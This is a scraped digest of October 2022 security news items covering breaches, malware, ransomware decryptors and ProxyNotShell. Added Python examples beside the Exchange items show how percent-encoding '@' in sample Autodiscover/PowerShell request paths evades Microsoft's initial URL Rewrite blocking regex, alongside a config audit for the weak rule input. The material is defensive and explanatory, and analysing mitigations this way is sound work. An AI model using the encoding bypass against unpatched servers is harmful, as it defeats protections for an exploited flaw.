Recently, Eileen Walther, Northwave’s Country Manager for Germany and specialized in information security, was elected the new Vice President of the Cyber Security Council Germany (Cyber-Sicherheitsrat Deutschland). Before joining Northwave, she was head of the Dutch High Tech Crime Team and strategic advisor at the German Federal Criminal Police Office (BKA – Bundeskriminalamt). The Cyber Security Council Germany was founded in August 2012. The Berlin-based association is politically neutral and advises companies, authorities and political … More

The post Fine-tuning Germany’s cybersecurity strategy appeared first on Help Net Security.

Autosummary: Moreover, on a national level, I believe that Germany should keep on joining forces with other EU member states that are leading in cybersecurity, such as the Netherlands, and dare to establish itself as an international pioneer. In this interview with Help Net Security, Walther talks about Germany’s cybersecurity future, working on information security strategy, and more.


                Former Uber CSO convicted for concealing data breach, theft from the authorities

                financial
                2022-10-06 https://www.helpnetsecurity.com/2022/10/06/former-uber-cso-convicted/

                Joe Sullivan, the former Chief Security Officer (CSO) of Uber, has been convicted of obstruction of proceedings of the Federal Trade Commission and misprision of felony in connection with the attempted cover-up of the hack Uber suffered in 2016. The conviction Sullivan was named Chief Security Officer at Uber in April 2015. “At that time, Uber had recently disclosed to the FTC that it had been the victim of a data breach in 2014,” the … More

The post Former Uber CSO convicted for concealing data breach, theft from the authorities appeared first on Help Net Security.

Autosummary: According to the DoJ, “The evidence showed that, despite knowing in great detail that Uber had suffered another data breach directly responsive to the FTC’s inquiry, Sullivan continued to work with the Uber lawyers handling or overseeing that inquiry, including the General Counsel of Uber, and never mentioned the incident to them.”


                “Egypt Leaks” – Hacktivists are Leaking Financial Data

                financial
                2022-10-06 https://securityaffairs.co/wordpress/136720/hacktivism/egypt-leaks-financial-data.html

Researchers at Resecurity, a California-based cybersecurity company protecting Fortune 500 corporations globally, have spotted a new group of hacktivists targeting financial institutions in Egypt. The bad actors operate under the campaign name “EG Leaks” (also known as “Egypt Leaks”); they started leaking […]

The post “Egypt Leaks” – Hacktivists are Leaking Financial Data appeared first on Security Affairs.

Autosummary: The geography of the affected banking clients is primarily centered in Cairo (70%), but includes Alexandria (12%), Aswan (8%), Giza (7%), Sohag (2%), Luxor (1%) and other major cities.


                Linux Kernel 5.19.12 bug could damage Intel laptop displays

                exploits
                2022-10-06 https://www.bleepingcomputer.com/news/linux/linux-kernel-51912-bug-could-damage-intel-laptop-displays/
Linux users have reported seeing weird white flashes and rapid blinking on their Intel laptop displays after upgrading to Linux kernel version 5.19.12, leading to warnings that the bug may damage displays. [...]

Autosummary: Meanwhile, the release of mainline version 6.0 was announced by Linus Torvalds on Sunday, bringing support for Arc GPUs, AMD RDNA 3, and Intel "Raptor Lake," performance-boosting scheduler changes for Intel Xeon and AMD EPYC chips, energy tweaks, and more.


                19-Year-Old Teen Arrested for Using Leaked Optus Breach Data in SMS Scam

                financial
                2022-10-06 https://thehackernews.com/2022/10/19-year-old-hacker-arrested-for-using.html
The Australian Federal Police (AFP) has arrested a 19-year-old teen from Sydney for allegedly attempting to leverage the data leaked following the Optus data breach late last month to extort victims. The suspect is said to have carried out a text message blackmail scam, demanding that the recipients transfer $2,000 to a bank account or risk getting their personal information misused for



                Former Uber Security Chief Found Guilty of Data Breach Coverup

                financial
                2022-10-06 https://thehackernews.com/2022/10/former-uber-security-chief-found-guilty.html
A U.S. federal court jury has found former Uber Chief Security Officer Joseph Sullivan guilty of not disclosing a 2016 breach of customer and driver records to regulators and attempting to cover up the incident. Sullivan has been convicted on two counts: One for obstructing justice by not reporting the incident and another for misprision. He faces a maximum of five years in prison for the

Autosummary: This past July, Uber also settled with the DoJ to pay $148 million and agreed to "implement a corporate integrity program, specific data security safeguards, and incident response and data breach notification plans, along with biennial assessments."


                Cisco fixed two high-severity bugs in Communications, Networking Products

                exploits
                2022-10-06 https://securityaffairs.co/wordpress/136743/security/cisco-communications-networking-products.html

                Cisco fixed high-severity flaws in some of its networking and communications products, including Enterprise NFV, Expressway and TelePresence. Cisco announced it has addressed high-severity vulnerabilities affecting some of its networking and communications products, including Enterprise NFV, Expressway and TelePresence. “Multiple vulnerabilities in the API and in the web-based management interface of Cisco Expressway Series Software […]

The post Cisco fixed two high-severity bugs in Communications, Networking Products appeared first on Security Affairs.

Autosummary: The first vulnerability, tracked as CVE-2022-20814, is an improper certificate validation issue; a remote, unauthenticated attacker can exploit it to access sensitive data through a man-in-the-middle attack.


                City of Tucson Data Breach impacted 123,500 individuals

                financial government
                2022-10-06 https://securityaffairs.co/wordpress/136735/data-breach/city-of-tucson-data-breach.html

The City of Tucson, Arizona disclosed a data breach; the incident was discovered in May 2022 and impacted 123,500 individuals. The security breach was discovered at the end of May 2022 and the investigation concluded in September. According to the notification letter sample provided to the Maine Attorney General’s Office, over 123,500 individuals have been impacted […]

The post City of Tucson Data Breach impacted 123,500 individuals appeared first on Security Affairs.

Autosummary: “The City is providing individuals with information on how to place a fraud alert and security freeze on one’s credit, the contact details for the national consumer reporting agencies, information on how to obtain a free credit report, a reminder to remain vigilant for incidents of fraud and identity theft by reviewing account statements and monitoring free credit reports, and encouragement to contact the Federal Trade Commission, their state Attorney General, and law enforcement to report attempted or actual identity theft and fraud.”


                US govt shares top flaws exploited by Chinese hackers since 2020

                exploits
                2022-10-06 https://www.bleepingcomputer.com/news/security/us-govt-shares-top-flaws-exploited-by-chinese-hackers-since-2020/
NSA, CISA, and the FBI revealed today the top security vulnerabilities most exploited by hackers backed by the People's Republic of China (PRC) to target U.S. government and critical infrastructure networks. [...]

Autosummary: "This joint CSA builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs)."


                AA22-279A: Top CVEs Actively Exploited By People’s Republic of China State-Sponsored Cyber Actors

                exploits government
                2022-10-06 https://us-cert.cisa.gov/ncas/alerts/aa22-279a
                Original release date: October 6, 2022

                Summary

                This joint Cybersecurity Advisory (CSA) provides the top Common Vulnerabilities and Exposures (CVEs) used since 2020 by People’s Republic of China (PRC) state-sponsored cyber actors as assessed by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). PRC state-sponsored cyber actors continue to exploit known vulnerabilities to actively target U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks.

                This joint CSA builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).

                NSA, CISA, and FBI urge U.S. and allied governments, critical infrastructure, and private sector organizations to apply the recommendations listed in the Mitigations section and Appendix A to increase their defensive posture and reduce the threat of compromise from PRC state-sponsored malicious cyber actors.

For more information on PRC state-sponsored malicious cyber activity, see CISA’s China Cyber Threat Overview and Advisories webpage, FBI’s Industry Alerts, and NSA’s Cybersecurity Advisories & Guidance.


                Technical Details

NSA, CISA, and FBI continue to assess PRC state-sponsored cyber activities as being one of the largest and most dynamic threats to U.S. government and civilian networks. PRC state-sponsored cybe


                Eternity Group Hackers Offering New LilithBot Malware as a Service to Cybercriminals

                exploits ciber
                2022-10-06 https://thehackernews.com/2022/10/eternity-group-hackers-offering-new.html
The threat actor behind the malware-as-a-service (MaaS) called Eternity has been linked to a new piece of malware called LilithBot. "It has advanced capabilities to be used as a miner, stealer, and a clipper along with its persistence mechanisms," Zscaler ThreatLabz researchers Shatak Jain and Aditya Sharma said in a Wednesday report. "The group has been continuously enhancing the malware, adding



                Details Released for Recently Patched new macOS Archive Utility Vulnerability

                exploits
                2022-10-06 https://thehackernews.com/2022/10/details-released-for-recently-patched.html
Security researchers have shared details about a now-addressed security flaw in Apple's macOS operating system that could be potentially exploited to run malicious applications in a manner that can bypass Apple's security measures. The vulnerability, tracked as CVE-2022-32910, is rooted in the built-in Archive Utility and "could lead to the execution of an unsigned and unnotarized application



                The need to change cybersecurity for the next generation

                ciber
                2022-10-06 https://www.welivesecurity.com/2022/10/06/need-change-cybersecurity-next-generation/

                Healthy habits that are instilled and nurtured at an early age bring lifelong benefits – the same applies to good cybersecurity habits

The post The need to change cybersecurity for the next generation appeared first on WeLiveSecurity

Autosummary: Whether the issue is trolling, cyberbullying, fraud, identity theft, grooming, credential theft, or one of the many other variants of cyberthreats, there are likely to be consequences – mental health consequences that are hidden from visual identification. It’s October, it’s Cybersecurity Awareness Month (CSAM), and with it the annual deluge of articles about phishing, passwords, protecting personal data and such like that will be hitting your inboxes very soon (if they have not already landed).


                Oort raises $15 million to defend enterprises against identity-based cyberattacks

                ciber
                2022-10-06 https://www.helpnetsecurity.com/2022/10/07/oort-funding/

                Oort announced the completion of a $15 million funding round, including both Seed and Series A investments. Oort will use the funds to grow and further accelerate its go-to-market (GTM) strategy. The funding round was co-led by .406 Ventures, a Boston-based early-stage venture capital firm specializing in cybersecurity, as well as Energy Impact Partners (EIP), a New York-based global investment platform, and included Cisco Investments. They join existing investors including 645 Ventures, Bain Capital Ventures … More

The post Oort raises $15 million to defend enterprises against identity-based cyberattacks appeared first on Help Net Security.

Autosummary: “With the increasing cyber risks to enterprises today, we know that an identity-first solution is critical to every security strategy,” said Shawn Cherian, partner, EIP.


                Watch out, a bug in Linux Kernel 5.19.12 can damage displays on Intel laptops

                exploits
                2022-10-06 https://securityaffairs.co/wordpress/136751/security/linux-kernel-5-19-12-bug.html

A bug in Linux Kernel 5.19.12 that was released at the end of September 2022 can potentially damage the displays of Intel laptops. Linux users reported the displays of their Intel laptops rapidly blinking, flickering, and showing white flashes after upgrading to Linux kernel version 5.19.12. Linux expert Ville Syrjälä pointed out that the anomalous […]

The post Watch out, a bug in Linux Kernel 5.19.12 can damage displays on Intel laptops appeared first on Security Affairs.


                BOD 23-01: Improving asset visibility and vulnerability detection on federal networks

                exploits
                2022-10-06 https://www.malwarebytes.com/blog/news/2022/10/improving-asset-visibility-and-vulnerability-detection-on-federal-networks

Categories: News

Tags: BOD 23-01, asset visibility, vulnerability detection, federal networks, CISA, CDM

CISA has issued BOD 23-01, which requires all FCEB entities to maintain an inventory of all IPv4- and IPv6-networked assets, perform regular, periodic scans of these devices, and provide this information to CISA.

                (Read more...)

The post BOD 23-01: Improving asset visibility and vulnerability detection on federal networks appeared first on Malwarebytes Labs.


                Assessing the state of the internet to make smart security decisions

                government
                2022-10-05 https://www.helpnetsecurity.com/2022/10/05/state-of-the-internet-smart-security-decisions-video/

                The internet constantly changes as new technologies are developed, and vulnerabilities are discovered. At the same time, organizations expand their operations that interact with the Internet. In this Help Net Security video, Emily Austin, Security Data Scientist at Censys, illustrates how assessing the state of the internet is essential for determining the risks and exposures that a company faces.

The post Assessing the state of the internet to make smart security decisions appeared first on Help Net Security.


                7 cybersecurity audiobooks you should listen to this year

                ciber
                2022-10-05 https://www.helpnetsecurity.com/2022/10/05/7-cybersecurity-audiobooks/

                Audiobooks have gained enormous popularity among book lovers for a variety of factors, including their convenience, which enables listeners to learn while running errands or traveling. Here’s a list of cybersecurity audiobooks that are worthy of your time. Cybersecurity: The Insights You Need from Harvard Business Review Author: Harvard Business Review This book brings you today’s most essential thinking on cybersecurity, from outlining the challenges to exploring the solutions, and provides you with the critical … More

The post 7 cybersecurity audiobooks you should listen to this year appeared first on Help Net Security.

Autosummary: Listeners will also find concrete strategies for aligning your security practices with the business, common myths and pitfalls when implementing Zero Trust and how to implement it in a cloud environment, and strategies for preventing breaches that encourage efficiency and cost reduction in your company’s security practices; Project Zero Trust is an ideal resource for aspiring technology professionals, as well as experienced IT leaders, network engineers, system admins, and project managers who are interested in or expected to implement zero-trust initiatives. From understanding the need, to core risk management principles, to threats, tools, roles, and responsibilities, this book walks the listener through each step of developing and implementing a cybersecurity program.


                Mitigation for Exchange Zero-Days Bypassed! Microsoft Issues New Workarounds

                exploits
                2022-10-05 https://thehackernews.com/2022/10/mitigation-for-exchange-zero-days.html
Microsoft has revised its mitigation measures for the newly disclosed and actively exploited zero-day flaws in Exchange Server after it was found that they could be trivially bypassed. The two vulnerabilities, tracked as CVE-2022-41040 and CVE-2022-41082, have been codenamed ProxyNotShell due to similarities to another set of flaws called ProxyShell, which the tech giant resolved last year.



                Canadian Netwalker Ransomware Affiliate Sentenced to 20 Years in U.S. Prison

                exploits ransomware
                2022-10-05 https://thehackernews.com/2022/10/canadian-netwalker-ransomware-affiliate.html
A former affiliate of the Netwalker ransomware has been sentenced to 20 years in prison in the U.S., a little over three months after the Canadian national pleaded guilty to his role in the crimes. Sebastien Vachon-Desjardins, 35, has also been ordered to forfeit $21,500,000 that was illicitly obtained from dozens of victims globally, including companies, municipalities, hospitals, law



                Microsoft updates mitigation for ProxyNotShell Exchange zero days

                exploits
                2022-10-05 https://www.bleepingcomputer.com/news/security/microsoft-updates-mitigation-for-proxynotshell-exchange-zero-days/
Microsoft has updated the mitigation for the latest Exchange zero-day vulnerabilities tracked as CVE-2022-41040 and CVE-2022-41082, also referred to as ProxyNotShell. [...]

Autosummary: Improved URL Rewrite rule. Reported privately to Microsoft three weeks ago, CVE-2022-41040 is a server-side request forgery (SSRF) that enables privilege escalation and works with CVE-2022-41082 to trigger remote code execution on on-premises Exchange Server deployments.
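The two ProxyNotShell items above say the first URL Rewrite mitigation was trivially bypassed and then revised, without showing why. The Python below is an added illustration written for this page, not code from the articles or from Microsoft: it emulates an IIS URL Rewrite "abort request" rule whose condition is a regex, and shows that a narrowly anchored pattern evaluated against the raw {REQUEST_URI} is sidestepped simply by percent-encoding a character the pattern insists on, while evaluating it against the URL-decoded input ({UrlDecode:{REQUEST_URI}}) or using a looser pattern closes that particular gap. The narrow pattern is the one widely quoted from Microsoft's initial guidance as recalled here, and the lookahead pattern follows the style of its later revision; treat both as illustrative rather than authoritative, and note that the sample request paths are constructed, not captured exploit traffic. The general lesson is the one a practitioner should take: a blocking regex is only as good as the normalisation applied before it runs.

```python
import re
from urllib.parse import unquote

# Narrow pattern as quoted from Microsoft's initial ProxyNotShell guidance (recalled;
# illustrative). It requires ".json", a literal "@" and "Powershell", in that order.
NARROW_PATTERN = r".*autodiscover\.json.*\@.*Powershell.*"

# Looser pattern in the style of the later revision: two lookaheads that only require
# the tokens "autodiscover" and "powershell" to appear somewhere in the URI, any order.
BROAD_PATTERN = r"(?=.*autodiscover)(?=.*powershell)"


def is_blocked(request_uri: str, pattern: str, url_decode: bool) -> bool:
    """Emulate an IIS URL Rewrite rule that aborts the request when its regex
    condition matches.

    url_decode=False mirrors a condition on {REQUEST_URI} (raw, still percent-encoded);
    url_decode=True mirrors a condition on {UrlDecode:{REQUEST_URI}}.
    URL Rewrite patterns ignore case by default, hence re.IGNORECASE.
    """
    target = unquote(request_uri) if url_decode else request_uri
    return re.search(pattern, target, re.IGNORECASE) is not None


# Constructed request paths (not captured exploit traffic): the Autodiscover front-end
# path with an "@"-style hop to the PowerShell backend, once plain and once with the "@"
# percent-encoded as %40, plus an unrelated benign OWA path for a false-positive check.
SAMPLE_URIS = {
    "plain": "/autodiscover/autodiscover.json?x@example.com/powershell/",
    "encoded_at": "/autodiscover/autodiscover.json?x%40example.com/powershell/",
    "benign": "/owa/auth/logon.aspx",
}


def evaluate_rules() -> dict:
    """For each sample URI, report whether each rule variant would block it."""
    results = {}
    for name, uri in SAMPLE_URIS.items():
        results[name] = {
            # original rule shape: narrow pattern over the raw URI
            "narrow_raw": is_blocked(uri, NARROW_PATTERN, url_decode=False),
            # same pattern, but the condition input is URL-decoded first
            "narrow_decoded": is_blocked(uri, NARROW_PATTERN, url_decode=True),
            # looser pattern that does not depend on ".json" or "@" surviving encoding
            "broad_raw": is_blocked(uri, BROAD_PATTERN, url_decode=False),
        }
    return results


if __name__ == "__main__":
    for name, verdicts in evaluate_rules().items():
        print(f"{name:11s} {verdicts}")
```

Running it shows the "encoded_at" request slipping past the narrow rule on the raw URI while being caught once the input is decoded or the looser pattern is used, and the benign OWA path untouched by every variant. Whichever pattern is deployed, the rule is a stopgap; the fix is applying the Exchange updates once available.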


                New Android malware "RatMilad" can steal your data, record audio

                financial exploits
                2022-10-05 https://www.bleepingcomputer.com/news/security/new-android-malware-ratmilad-can-steal-your-data-record-audio/
A new Android spyware named "RatMilad" was discovered targeting mobile devices in the Middle East, used to spy on victims and steal data. [...]

Autosummary: RatMilad collects basic device information (model, brand, build ID, Android version), the device MAC address, the contact list, SMS messages, call logs, account names and permissions, the list of installed applications and their permissions, clipboard data, GPS location data, SIM information (number, country, IMEI, state), file lists and file contents. Moreover, RatMilad can perform file actions such as deleting and stealing files, modifying the permissions of the installed app, or even using the device's microphone to record audio and eavesdrop on the room.


                CISA orders federal agencies to regularly perform IT asset discovery, vulnerability enumeration

                exploits
                2022-10-05 https://www.helpnetsecurity.com/2022/10/05/cisa-asset-discovery-vulnerability-enumeration/

                A new directive issued by the Cybersecurity and Infrastructure Security Agency (CISA) is ordering US federal civilian agencies to perform regular asset discovery and vulnerability enumeration, to better account for and protect the devices that reside on their networks. About the Directive “Over the past several years, CISA has been working urgently to gain greater visibility into risks facing federal civilian networks, a gap made clear by the intrusion campaign targeting SolarWinds devices,” the agency … More

                The post CISA orders federal agencies to regularly perform IT asset discovery, vulnerability enumeration appeared first on Help Net Security.

                "

                Autosummary: "


                Experts Warn of New RatMilad Android Spyware Targeting Enterprise Devices

                financial
                2022-10-05 https://thehackernews.com/2022/10/experts-warn-of-new-ratmilad-android.html
                A novel Android malware called RatMilad has been observed targeting a Middle Eastern enterprise mobile device by concealing itself as a VPN and phone number spoofing app. The mobile trojan functions as advanced spyware with capabilities to receive and execute commands to collect and exfiltrate a wide variety of data from the infected mobile endpoint, Zimperium said in a report shared with "

                Autosummary: "


                Telstra Telecom Suffers Data Breach Potentially Exposing Employee Information

                financial
                2022-10-05 https://thehackernews.com/2022/10/telstra-telecom-suffers-data-breach.html
                Australia's largest telecommunications company Telstra disclosed that it was the victim of a data breach through a third-party, nearly two weeks after Optus reported a breach of its own. "There has been no breach of Telstra's systems," Narelle Devine, the company's chief information security officer for the Asia Pacific region, said. "And no customer account data was involved." It "

                Autosummary: "


                FBI, CISA, and NSA Reveal How Hackers Targeted a Defense Industrial Base Organization

                industry
                2022-10-05 https://thehackernews.com/2022/10/fbi-cisa-and-nsa-reveal-how-hackers.html
                U.S. cybersecurity and intelligence agencies on Tuesday disclosed that multiple nation-state hacking groups potentially targeted a "Defense Industrial Base (DIB) Sector organization's enterprise network" as part of a cyber espionage campaign. "[Advanced persistent threat] actors used an open-source toolkit called Impacket to gain their foothold within the environment and further compromise the "

                Autosummary: "


                Telstra Telecom discloses data breach impacting former and current employees

                financial
                2022-10-05 https://securityaffairs.co/wordpress/136683/hacking/telstra-third-party-breach.html

                Bad news for the Australian telecommunications industry: Telstra, the largest company in the country, has suffered a data breach. Australia’s largest telecommunications company Telstra disclosed a data breach through a third-party supplier. The company pointed out that its own systems have not been breached; the incident affected a third-party supplier that previously provided a now-obsolete Telstra […]

                The post Telstra Telecom discloses data breach impacting former and current employees appeared first on Security Affairs.

                "

                Autosummary: Here are the key facts: 👉 This wasn't a breach of any Telstra system 👉 No customer account info was included 👉 The data includes first/last names and employee email addresses 👉 The data is from 2017 — Telstra (@Telstra) October 4, 2022. Data leaked online was from 2017; it includes the names (first and last) and email addresses used to sign up for the employee rewards program. "


                Chase UK's app-only bank hit with 24-hour ongoing outage

                financial
                2022-10-05 https://www.bleepingcomputer.com/news/technology/chase-uks-app-only-bank-hit-with-24-hour-ongoing-outage/
                Chase UK's ongoing outage has been impacting British customers with a mobile-based current account for well over 24 hours. [...] "

                Autosummary: Chase UK's current account MasterCard bears no 16-digit number (BleepingComputer). While Chase UK's current account customers are offered a physical debit card with a very real chip and a magnetic strip for in-person purchases, the card itself bears no visible 16-digit number, expiration date or CVV, all of which are available only via the mobile app. Chase Bank UK's mobile-based Current Account app down: several users also reported issues when attempting to log into the app or access their card number, which can be seen solely from within the mobile app. "


                Avast releases free decryptor for Hades ransomware variants

                exploits ransomware
                2022-10-05 https://www.bleepingcomputer.com/news/security/avast-releases-free-decryptor-for-hades-ransomware-variants/
                Avast has released a decryptor for variants of the Hades ransomware known as "MafiaWare666", "Jcrypt", "RIP Lmao", and "BrutusptCrypt," allowing victims to recover their files for free. [...] "

                Autosummary: These variants include the following extensions and strings appended/prepended to an encrypted file's name: .MafiaWare666 .jcrypt .brutusptCrypt .bmcrypt .cyberone .l33ch. If you were affected by one of these variants, you can download the free decryptor from here, run the executable, select the drive that holds the encrypted files, and point the tool to a sample pair of encrypted and original files. "


                City of Tucson discloses data breach affecting over 125,000 people

                financial government
                2022-10-05 https://www.bleepingcomputer.com/news/security/city-of-tucson-discloses-data-breach-affecting-over-125-000-people/
                The City of Tucson, Arizona, has disclosed a data breach affecting the personal information of more than 125,000 individuals. [...] "

                Autosummary: "


                Hundreds of Microsoft SQL servers backdoored with new malware

                exploits
                2022-10-05 https://www.bleepingcomputer.com/news/security/hundreds-of-microsoft-sql-servers-backdoored-with-new-malware/
                Security researchers have found a new piece of malware targeting Microsoft SQL servers. Named Maggie, the backdoor has already infected hundreds of machines all over the world. [...] "

                Autosummary: “When enabled, Maggie redirects any incoming connection (on any port the MSSQL server is listening on) to a previously set IP and port, if the source IP address matches a user-specified IP mask” - DCSO CyTec “The implementation enables port reuse, making the redirection transparent to authorized users, while any other connecting IP is able to use the server without any interference or knowledge of Maggie,” the researchers added. "


                FBI: Cyberattacks targeting election systems unlikely to affect results

                ciber
                2022-10-05 https://www.bleepingcomputer.com/news/security/fbi-cyberattacks-targeting-election-systems-unlikely-to-affect-results/
                The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) say in a public service announcement that cyber activity attempting to compromise election infrastructure is unlikely to cause a massive disruption or prevent voting. [...] "

                Autosummary: As for what people can do to protect themselves from potential attempts of election-related fraud, the FBI has issued the following recommendations: Use official state and local government portals to source information about voter registration, polling locations, voting by mail, provisional ballot process, and final election results. "


                BlackByte ransomware abuses legit driver to disable security products

                exploits ransomware
                2022-10-05 https://www.bleepingcomputer.com/news/security/blackbyte-ransomware-abuses-legit-driver-to-disable-security-products/
                The BlackByte ransomware gang is using a new technique that researchers are calling "Bring Your Own Driver," which enables bypassing protections by disabling more than 1,000 drivers used by various security solutions. [...] "

                Autosummary: Attack details Security researchers at cybersecurity company Sophos explain that the abused MSI graphics driver offers I/O control codes directly accessible by user-mode processes, which violates Microsoft’s security guidelines on kernel memory access. "


                Avast releases a free decryptor for some Hades ransomware variants

                exploits ransomware
                2022-10-05 https://securityaffairs.co/wordpress/136710/malware/hades-ransomware-decryptor.html

                Avast has released a decryptor for variants of the Hades ransomware known as ‘MafiaWare666’, ‘Jcrypt’, ‘RIP Lmao’, and ‘BrutusptCrypt’, which can allow the victims of these ransomware strains to recover their files without paying the […]

                The post Avast releases a free decryptor for some Hades ransomware variants appeared first on Security Affairs.

                "

                Autosummary: The malware samples analyzed by the researchers append the following extensions to the filenames of the encrypted files: .MafiaWare666 .jcrypt .brutusptCrypt .bmcrypt .cyberone .l33ch. Once the MafiaWare666 variant completes the encryption process, it displays a window that provides payment instructions to the victims. "


                New Maggie malware already infected over 250 Microsoft SQL servers

                exploits
                2022-10-05 https://securityaffairs.co/wordpress/136693/cyber-crime/maggie-malware-microsoft-sql-server.html

                Hundreds of Microsoft SQL servers all over the world have been infected with a new piece of malware tracked as Maggie. Security researchers Johann Aydinbas and Axel Wauer from the DCSO CyTec have spotted a new piece of malware, named Maggie, that has already infected over 250 Microsoft SQL servers worldwide. Most of the infected instances […]

                The post New Maggie malware already infected over 250 Microsoft SQL servers appeared first on Security Affairs.

                "

                Autosummary: Most of the infected instances are in South Korea, India, Vietnam, China, Russia, Thailand, Germany, and the United States. "


                Bogus job offers hide trojanised open-source software

                exploits
                2022-10-05 https://www.malwarebytes.com/blog/news/2022/10/bogus-job-offers-lead-to-weaponised-open-source-software

                Categories: News

                Tags: malware, ZINC, microsoft, infection, C&C, open source, job offer, fake, LinkedIn

                The North Korean ZINC group is accused of creating trojanised versions of KiTTY, PuTTY, TightVNC, and other popular open-source software apps


                The post Bogus job offers hide trojanised open-source software appeared first on Malwarebytes Labs.

                "

                Autosummary: Posted: October 5, 2022. The North Korean ZINC group is accused of creating trojanised versions of KiTTY, PuTTY, TightVNC, and other popular open-source software apps. Microsoft researchers are warning of fake job offers where the only actual compensation available is a golden handshake of malware and trickery. The targets are the kind of people who might have access to confidential information, sensitive data, journalists, important passwords, etc. "


                Avast releases free decryptor for MafiaWare666 ransomware variants

                exploits ransomware
                2022-10-05 https://www.bleepingcomputer.com/news/security/avast-releases-free-decryptor-for-mafiaware666-ransomware-variants/
                ​Avast has released a decryptor for variants of the MafiaWare666 ransomware known as "Jcrypt", "RIP Lmao", and "BrutusptCrypt," allowing victims to recover their files for free. [...] "

                Autosummary: These variants include the following extensions and strings appended/prepended to an encrypted file's name: .MafiaWare666 .jcrypt .brutusptCrypt .bmcrypt .cyberone .l33ch. If you were affected by one of these variants, you can download the free decryptor from here, run the executable, select the drive that holds the encrypted files, and point the tool to a sample pair of encrypted and original files. "


                HackNotice’s phishing capability empowers users to identify phishing emails

                financial
                2022-10-04 https://www.helpnetsecurity.com/2022/10/04/hacknotice-phishing-capability/

                HackNotice has added continuous phishing capability that educates employees about phishing and social engineering attacks while helping businesses to achieve cybersecurity compliance. HackNotice’s phishing helps people understand and recognize the different types of attacks threat actors can deploy. Writing, sending, and reviewing phishing campaigns is often a laborious process for the security team, with expensive phishing platforms leaving much to be desired. HackNotice’s phishing, deployed with the press of a button, empowers people to identify … More

                The post HackNotice’s phishing capability empowers users to identify phishing emails appeared first on Help Net Security.

                "

                Autosummary: "


                Critical Insight releases Cybersecurity-as-a-Service to protect organizations from threats

                ciber
                2022-10-04 https://www.helpnetsecurity.com/2022/10/04/critical-insight-cybersecurity-as-a-service/

                Critical Insight has released an end-to-end offering that will evolve the security programs of healthcare, public sector, and SMB organizations. For IT Teams constrained in their ability to handle the ever-changing complexities of cybersecurity, Critical Insight is putting all of its services under one delivery model: Cybersecurity-as-a-Service. Cybersecurity-as-a-Service integrates Critical Insight’s software, professional and technology services into a unified solution that allows customers to prepare for an attack with risk assessments, technical testing and training; … More

                The post Critical Insight releases Cybersecurity-as-a-Service to protect organizations from threats appeared first on Help Net Security.

                "

                Autosummary: "


                What should investing in cybersecurity look like for a technology organization?

                ciber
                2022-10-04 https://www.helpnetsecurity.com/2022/10/04/investing-in-cybersecurity-technology-organization-video/

                To withstand cyberattacks, businesses must continually update internal systems and avoid hasty tech upgrades that might open the door to attackers. In this Help Net Security video, Phillip Verheyden, Security Engineer at Shipwell, discusses the challenges technology organizations face when investing in cybersecurity and offers tips for CISOs, from securing development to dealing with phishing attacks.

                The post What should investing in cybersecurity look like for a technology organization? appeared first on Help Net Security.

                "

                Autosummary: "


                HTTP request smuggling vulnerability in Node.js (CVE-2022-35256)

                exploits
                2022-10-04 https://www.helpnetsecurity.com/2022/10/04/http-request-smuggling-vulnerability-cve-2022-35256-video/

                In this Help Net Security video, Austin Jones, Principal Software Engineer at ThreatX, explains what HTTP request smuggling is, and discusses a recently uncovered HTTP request smuggling vulnerability in Node.js (CVE-2022-35256). This vulnerability allows an attacker to bypass security controls on the target server to conduct any nefarious activities.

                The post HTTP request smuggling vulnerability in Node.js (CVE-2022-35256) appeared first on Help Net Security.

                "

                Autosummary: "


                Microsoft mitigations for recently disclosed Exchange zero-days can be easily bypassed

                exploits
                2022-10-04 https://securityaffairs.co/wordpress/136596/hacking/microsoft-exchange-0day-mitigations-bypass.html

                The mitigation shared by Microsoft for the two recently disclosed Exchange zero-day vulnerabilities can be bypassed, expert warns. Last week, Microsoft confirmed that two zero-day vulnerabilities in Microsoft Exchange recently disclosed by researchers at cybersecurity firm GTSC are being actively exploited in the wild. The first flaw, tracked as CVE-2022-41040, is a Server-Side Request Forgery (SSRF) issue. […]

                The post Microsoft mitigations for recently disclosed Exchange zero-days can be easily bypassed appeared first on Security Affairs.

                "

                Autosummary: Change the condition input from {URL} to {REQUEST_URI}. Microsoft also recommends customers block the following Remote PowerShell ports: HTTP: 5985, HTTPS: 5986. Microsoft also recommends that Exchange Server customers disable remote PowerShell access for non-admin users in the organization. "
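The {URL} to {REQUEST_URI} change above (the "improved URL Rewrite rule" the earlier Exchange item refers to) is easy to audit for mechanically. The following Python is an added example, not Microsoft's published mitigation or anything from the article: it parses a constructed IIS web.config fragment, reports any rewrite condition that matches on {URL}, and writes out the hardened form. The rule name and the regex pattern are placeholders, not the exact pattern Microsoft shipped.

```python
"""Added example, not Microsoft's mitigation or the article's code: audit an IIS
URL Rewrite rule for the weak condition input ({URL}) and emit the hardened form
({REQUEST_URI}). WEAK_CONFIG is a constructed web.config fragment; the rule name
and pattern are placeholders, not the exact rule Microsoft published."""
from __future__ import annotations

import xml.etree.ElementTree as ET

WEAK_CONFIG = """\
<configuration>
  <system.webServer>
    <rewrite>
      <rules>
        <rule name="BlockAutodiscoverPowershell" stopProcessing="true">
          <match url=".*" />
          <conditions>
            <add input="{URL}" pattern=".*autodiscover\\.json.*Powershell.*" />
          </conditions>
          <action type="AbortRequest" />
        </rule>
      </rules>
    </rewrite>
  </system.webServer>
</configuration>
"""

WEAK_INPUT = "{URL}"              # URL Rewrite: path portion only, no query string
HARDENED_INPUT = "{REQUEST_URI}"  # URL Rewrite: full request URI including query string


def audit_rewrite_rules(web_config_xml: str) -> list[dict[str, str]]:
    """Return one finding per rewrite condition whose input is {URL}."""
    root = ET.fromstring(web_config_xml)
    findings = []
    for rule in root.iter("rule"):
        for cond in rule.iter("add"):
            if cond.get("input", "").upper() == WEAK_INPUT:
                findings.append({
                    "rule": rule.get("name", "<unnamed>"),
                    "input": cond.get("input", ""),
                    "pattern": cond.get("pattern", ""),
                })
    return findings


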